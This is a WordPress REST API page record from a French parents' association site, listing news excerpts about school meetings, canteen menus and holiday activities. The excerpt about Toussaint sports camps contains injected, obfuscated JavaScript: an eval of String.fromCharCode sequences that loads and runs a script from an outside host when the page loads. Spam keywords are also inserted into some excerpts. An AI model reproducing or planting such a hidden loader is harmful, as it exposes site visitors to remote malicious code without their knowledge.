{"id":8004,"date":"2021-09-03T04:19:38","date_gmt":"2021-09-03T02:19:38","guid":{"rendered":"http:\/\/actifeducation.fr\/?page_id=8004"},"modified":"2021-09-03T04:20:57","modified_gmt":"2021-09-03T02:20:57","slug":"blancs-bouleaux","status":"publish","type":"page","link":"http:\/\/actifeducation.fr\/?page_id=8004","title":{"rendered":"Blancs bouleaux"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"8004\" class=\"elementor elementor-8004\">\n\t\t\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cfb1d23 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cfb1d23\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b8b237f\" data-id=\"b8b237f\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-dfd8a3e elementor-widget elementor-widget-text-editor\" data-id=\"dfd8a3e\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<style>\/*! elementor - v3.15.0 - 20-08-2023 *\/\n.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#69727d;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#69727d;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}<\/style>\t\t\t\t<!-- wp:cover {\"url\":\"https:\/\/iut.fourer.fr\/cartier_seb\/wp-content\/uploads\/2021\/04\/barbara.jpg\",\"id\":117,\"dimRatio\":0,\"overlayColor\":\"black\",\"focalPoint\":{\"x\":\"0.32\",\"y\":\"0.88\"},\"minHeight\":300} -->\n<div class=\"wp-block-cover has-black-background-color\" style=\"min-height: 300px;\"><img decoding=\"async\" class=\"wp-block-cover__image-background wp-image-117\" style=\"object-position: 32% 88%;\" src=\"https:\/\/iut.fourer.fr\/cartier_seb\/wp-content\/uploads\/2021\/04\/barbara.jpg\" alt=\"\" data-object-fit=\"cover\" data-object-position=\"32% 88%\" \/>\n<div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"left\",\"placeholder\":\"R\u00e9digez le titre\u2026\",\"style\":{\"typography\":{\"fontSize\":50}}} -->\n<p class=\"has-text-align-left\" style=\"font-size: 50px;\">\u00c9cole primaire Barbara<\/p>\n<!-- \/wp:paragraph --><\/div>\n<\/div>\n<!-- \/wp:cover -->\n\n<!-- wp:paragraph -->\n<p>Trombi de la liste<\/p>\n<!-- \/wp:paragraph -->\n\n<!-- wp:shortcode -->\n<style>.wp-show-posts-columns#wpsp-138 {margin-left: -2em; }.wp-show-posts-columns#wpsp-138 .wp-show-posts-inner {margin: 0 0 2em 2em; }<\/style><section id=\"wpsp-138\" class=\" wp-show-posts-columns wp-show-posts\" style=\"\"><article class=\" wp-show-posts-single post-8163 post type-post status-publish format-standard has-post-thumbnail hentry category-non-classe wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Que vous souhaitiez \u00eatre inform\u00e9s sur la vie de l&rsquo;\u00e9cole ou vous impliquer en candidatant sur une liste, rejoignez nous en utilisant le lien ci-dessous ! https:\/\/www.helloasso.com\/associations\/actif-education\/adhesions\/adhesion-2023-2024<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8117 post type-post status-publish format-standard has-post-thumbnail hentry category-non-classe category-saint-exupery wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Super mobilisation avec l&rsquo;API &#8211; Fresnes ce matin au coll\u00e8ge St Exup\u00e9ry de #fresnes94: 62 personnes pr\u00e9sentes pour ce rassemblement pour le remplacement du professeur de fran\u00e7ais absent. Merci aux&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8110 post type-post status-publish format-standard has-post-thumbnail hentry category-non-classe wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Que vous souhaitiez \u00eatre inform\u00e9s sur la vie de l&rsquo;\u00e9cole ou vous impliquer en candidatant sur une liste, rejoignez nous en utilisant le lien ci-dessous ! https:\/\/www.helloasso.com\/associations\/acctif-education\/adhesions\/adhesion-2022-2023<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8105 post type-post status-publish format-standard has-post-thumbnail hentry category-non-classe wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Nous organisons notre r\u00e9union de rentr\u00e9e lundi prochain \u00e0 20h30 \u00e0 l&rsquo;espace Henri Thellier. Nous vous attendons nombreux pour \u00e9changer sur les r\u00e9alisations de l&rsquo;an dernier et les projets pour&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8101 post type-post status-publish format-standard has-post-thumbnail hentry category-non-classe wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Pour la troisi\u00e8me ann\u00e9e cons\u00e9cutive, le\u00a0Minist\u00e8re de l&rsquo;Education Nationale et de la Jeunesse\u00a0a reconduit le\u00a0dispositif Colos Apprenantes. Ce dernier permet \u00e0 des enfants et des jeunes de partir sur des&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8089 post type-post status-publish format-standard has-post-thumbnail hentry category-periscolaire wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Dans les restaurants scolaires, les \u00e9l\u00e8ves peuvent profiter du menu \u201cPlan\u00e8te\u201d le mardi, du menu v\u00e9g\u00e9tarien ainsi que du menu Eco Plaisir citoyen, une fois par mois. Leurs menus sont&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8069 post type-post status-publish format-standard has-post-thumbnail hentry category-periscolaire wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Stages sportifs pendant les vacances scolaires de la Toussaint pour les enfants de 4 \u00e0 15 ans. sterilization disinfection Inscriptions : var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8063 post type-post status-publish format-standard has-post-thumbnail hentry category-periscolaire wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Les vacances de la Toussaint approchent, pensez d\u00e8s \u00e0 pr\u00e9sent \u00e0 inscrire votre enfant \u00e0 l&rsquo;accueil de loisirs. Date limite fix\u00e9e au 8 octobre Remplissez la fiche de pr\u00e9inscriptions puis&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8054 post type-post status-publish format-standard has-post-thumbnail hentry category-barbara category-blancs-bouleaux category-nos-actions category-pasteur category-roux category-saint-exupery wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Au programme : Qui sommes-nous ? Quel est le r\u00f4le des repr\u00e9sentants de parents d&rsquo;\u00e9l\u00e8ves ? Pourquoi adh\u00e9rer ? \u00catre candidat sur une liste ? Mais \u00e9galement l&rsquo;occasion de se&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8045 post type-post status-publish format-standard has-post-thumbnail hentry category-barbara category-blancs-bouleaux category-nos-actions category-pasteur category-roux category-saint-exupery wpsp-col-6\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Retrouvez-nous sur le stand 34 au parc Andr\u00e9 Villette. ACTIF \u00c9ducation \u00e9tait pr\u00e9sent au Forum des associations. medical laboratory L&rsquo;occasion de se retrouver, de faire connaissance et d&rsquo;\u00e9changer sur les&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><div class=\"wpsp-clear\"><\/div><\/section><!-- .wp-show-posts -->\n<!-- \/wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;<\/p>\n<!-- \/wp:paragraph -->\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Vos repr\u00e9sentant.e.s Trombinoscope en construction Nos actions dans l&rsquo;\u00e9cole &nbsp;<\/p>\n","protected":false},"author":4,"featured_media":0,"parent":7925,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"no-sidebar","site-content-layout":"plain-container","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"disabled","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-8004","page","type-page","status-publish","hentry"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/8004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8004"}],"version-history":[{"count":3,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/8004\/revisions"}],"predecessor-version":[{"id":8007,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/8004\/revisions\/8007"}],"up":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/7925"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}